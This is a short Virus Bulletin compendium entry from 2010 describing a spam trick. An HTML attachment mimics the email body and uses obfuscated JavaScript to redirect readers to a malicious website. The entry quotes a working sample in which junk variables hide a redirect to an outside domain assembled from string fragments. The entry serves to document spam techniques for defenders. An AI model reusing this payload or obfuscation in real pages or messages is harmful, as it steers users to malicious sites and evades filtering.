The Responsibility Transfer

UO!Responsibility!JavaScript

  31 August 2010

Description

Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. See also Script in the Middle.

Submitted by Sorin Mustaca.

Example

 <script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;
 document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");
 this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";
 var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;
 </script>

Entries

No Whitespace, No Cry

Spammers compendium entry - No Whitespace, No Cry

Honey, I shrunk the font (HTML)

Spammers compendium entry - Honey, I shrunk the font

Honey, I shrunk the font (CSS)

Spammers compendium entry - Honey, I shrunk the font

Bogus Login

Spammers compendium entry - Bogus Login

A Numbers Game

Spammers compendium entry - A Numbers Game

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.